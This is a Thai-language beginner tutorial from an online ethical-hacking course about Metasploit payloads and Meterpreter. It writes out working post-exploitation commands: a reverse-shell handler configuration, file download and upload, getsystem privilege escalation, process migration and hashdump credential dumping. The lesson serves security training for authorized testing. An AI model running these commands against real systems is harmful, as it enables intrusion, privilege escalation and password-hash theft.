เพย์โหลดและ Meterpreter
เชลล์หลังการโจมตี
เพย์โหลดและ Meterpreter เป็นบทเรียน Ethical Hacking Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Ethical Hacking Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน
เพย์โหลดคืออะไร
เพย์โหลด คือโค้ดที่ทำงานบนเป้าหมายหลังจากช่องโหว่โจมตีทำงานสำเร็จ โดยกำหนดว่าคุณจะทำอะไรต่อได้บ้าง ตั้งแต่การเรียกใช้คำสั่งเดียวไปจนถึงการเปิดเชลล์แบบโต้ตอบเต็มรูปแบบ
การเลือกเพย์โหลดที่เหมาะสมขึ้นอยู่กับ OS ของเป้าหมาย การตั้งค่าเครือข่าย และระดับการเข้าถึงที่คุณต้องการ
แบบแบ่งระยะเทียบกับแบบไม่แบ่งระยะ
เพย์โหลดมีรูปแบบการส่งมอบสองแบบ:
- แบบแบ่งระยะ (สังเกต
/ในmeterpreter/reverse_tcp): ส่งส่วนเริ่มต้นขนาดเล็กก่อน แล้วจึงดาวน์โหลดเพย์โหลดเต็มรูปแบบ ทำให้มีขนาดเริ่มต้นเล็กกว่า - แบบไม่แบ่งระยะ (สังเกต
_ในmeterpreter_reverse_tcp): ส่งเพย์โหลดทั้งหมดในครั้งเดียว มีความน่าเชื่อถือมากกว่าในเครือข่ายที่ไม่เสถียร
เชลล์แบบผูกและแบบย้อนกลับ
ทิศทางการเชื่อมต่อมีสองแบบ:
- เชลล์แบบผูก: เป้าหมายเปิดพอร์ตและรอ จากนั้นคุณจึงเชื่อมต่อ ไปยัง เป้าหมาย มักถูกไฟร์วอลล์ปิดกั้น
- เชลล์แบบย้อนกลับ: เป้าหมายเชื่อมต่อกลับมา หาคุณ (LHOST/LPORT) โดยทั่วไปจะผ่านไฟร์วอลล์ที่อนุญาตการเชื่อมต่อขาออกได้
ด้วยเหตุนี้ เพย์โหลดแบบย้อนกลับจึงเป็นค่าเริ่มต้นที่ใช้กันทั่วไป
ทำความรู้จัก Meterpreter
Meterpreter คือเพย์โหลดขั้นสูงของ Metasploit ต่างจากเชลล์คำสั่งพื้นฐานตรงที่ทำงาน ในหน่วยความจำ สื่อสารผ่านช่องทางที่เข้ารหัส และมีชุดคำสั่งจำนวนมากสำหรับการทำงานหลังการโจมตี
เนื่องจากไม่เขียนข้อมูลลงดิสก์ จึงลอบเร้นได้ดีกว่าการวางไฟล์โปรแกรมแยกต่างหาก
คำสั่งหลักของ Meterpreter
เมื่อคุณมีเซสชัน Meterpreter แล้ว คำสั่งพื้นฐานจะช่วยให้คุณทำความเข้าใจสภาพแวดล้อมของเป้าหมาย
sysinfo # OS, architecture, hostname
getuid # current user context
ps # running processes
pwd ls cd # filesystem navigationการถ่ายโอนไฟล์
Meterpreter ย้ายไฟล์ระหว่างเครื่องของคุณกับเป้าหมายด้วยคำสั่งง่าย ๆ ซึ่งมีประโยชน์สำหรับการเก็บหลักฐานหรือเตรียมเครื่องมือในการทดสอบที่ได้รับอนุญาต
download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\การเข้าสู่เชลล์ระบบ
คำสั่ง shell จะพาคุณออกจาก Meterpreter ไปยังตัวแปลคำสั่งดั้งเดิมของเป้าหมาย (cmd.exe หรือ /bin/sh) เมื่อคุณต้องการเรียกใช้คำสั่งระดับ OS โดยตรง
พิมพ์ exit เพื่อกลับไปยังพรอมต์ของ Meterpreter โดยไม่ทำให้เซสชันหายไป
shell
# C:\> whoami
# exit -> back to meterpreterการยกระดับสิทธิ์
โดยมากคุณจะเข้าสู่ระบบด้วยสิทธิ์ที่จำกัด Meterpreter ช่วยยกระดับสิทธิ์ได้ดังนี้:
getsystemจะพยายามใช้เทคนิคที่รู้จักเพื่อให้ได้สิทธิ์ SYSTEM บน Windows- โมดูลหลังการโจมตี
local_exploit_suggesterจะแนะนำช่องโหว่โจมตีเพื่อยกระดับสิทธิ์ภายในเครื่องสำหรับโฮสต์นั้น
สิทธิ์ที่สูงขึ้นช่วยให้เข้าถึงการถ่ายโอนข้อมูลประจำตัวและการเข้าถึงเชิงลึกยิ่งขึ้น
getsystem
run post/multi/recon/local_exploit_suggesterการย้ายกระบวนการ
เซสชันของคุณทำงานอยู่ภายในกระบวนการ หากกระบวนการนั้นไม่เสถียรหรือมีแนวโน้มว่าจะถูกยุติ ให้ใช้ migrate เพื่อย้ายไปยังกระบวนการที่เสถียรกว่าและทำงานต่อเนื่องเป็นเวลานาน เพื่อให้เซสชันยังคงทำงานอยู่
การย้ายไปยังกระบวนการที่มีระดับสิทธิ์ตรงกับคุณยังช่วยให้กลมกลืนกับระบบ และอาจเปลี่ยนบริบทผู้ใช้ของคุณได้
ps
migrate 1340 # migrate into a stable PIDการรักษาการเข้าถึง
Meterpreter มีความสามารถสำหรับเก็บข้อมูลที่เป็นประโยชน์ระหว่างการประเมินที่ได้รับอนุญาต เช่น hashdump เพื่อรวบรวมค่าแฮชรหัสผ่าน และเครื่องมือสแกนแป้นพิมพ์เพื่อสาธิตผลกระทบของการดักจับข้อมูลนำเข้า
ใช้ความสามารถเหล่านี้เฉพาะภายในขอบเขตที่ตกลงกันไว้ และบันทึกทุกอย่างไว้ในรายงานสำหรับลูกค้า
hashdump
run post/windows/gather/checkvmตัวรับการเชื่อมต่อ
เพย์โหลดแบบย้อนกลับจำเป็นต้องมีสิ่งที่รอรับฟังอยู่ฝั่งคุณเพื่อรับการเชื่อมต่อ โมดูล multi/handler ทำหน้าที่เป็นตัวรับดังกล่าว คุณต้องกำหนดค่าโดยใช้เพย์โหลด LHOST และ LPORT เดียวกับที่ใช้สร้างเพย์โหลด
สิ่งนี้จำเป็นเมื่อคุณส่งมอบเพย์โหลดจาก msfvenom นอกคอนโซล ให้เริ่มตัวรับการเชื่อมต่อก่อน แล้วจึงเรียกใช้เพย์โหลดบนเป้าหมาย
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -jตรวจสอบอย่างรวดเร็ว
เลือกเพย์โหลดที่สามารถหลบเลี่ยงไฟร์วอลล์ที่เข้มงวดได้
สรุปทบทวน
คุณได้เรียนรู้เรื่องเพย์โหลดและ Meterpreter แล้ว:
- เพย์โหลดอาจเป็นแบบ แบ่งระยะ (/) หรือ ไม่แบ่งระยะ (_) และอาจเป็นแบบ ผูก หรือ ย้อนกลับ โดยแบบย้อนกลับมักผ่านไฟร์วอลล์ได้ดีกว่า
- Meterpreter ทำงานในหน่วยความจำผ่านช่องทางที่เข้ารหัส พร้อมคำสั่งจำนวนมาก
- งานหลัก ได้แก่ sysinfo, getuid, ps, download/upload, shell
- ยกระดับสิทธิ์ด้วย getsystem และ local_exploit_suggester และใช้ migrate เพื่อความเสถียร
- ใช้ความสามารถในการเก็บข้อมูลเฉพาะภายในขอบเขต และบันทึกทุกอย่าง
ถัดไป: โมดูลหลังการโจมตี การใช้เส้นทางผ่านระบบ และการเก็บข้อมูล
คำถามที่พบบ่อย
บทเรียน “เพย์โหลดและ Meterpreter” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “เพย์โหลดและ Meterpreter” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Ethical Hacking Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “เพย์โหลดและ Meterpreter”
เชลล์หลังการโจมตี คุณปฏิบัติ Ethical Hacking Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Ethical Hacking Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Ethical Hacking Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน
บทเรียน “เพย์โหลดและ Meterpreter” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Ethical Hacking Academy นี้ได้ไหม
ได้ บทเรียน Ethical Hacking Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- สถาปัตยกรรม Metasploit
- การค้นหาและใช้ช่องโหว่
- เพย์โหลดและ Meterpreter
- มอดูลหลังการโจมตี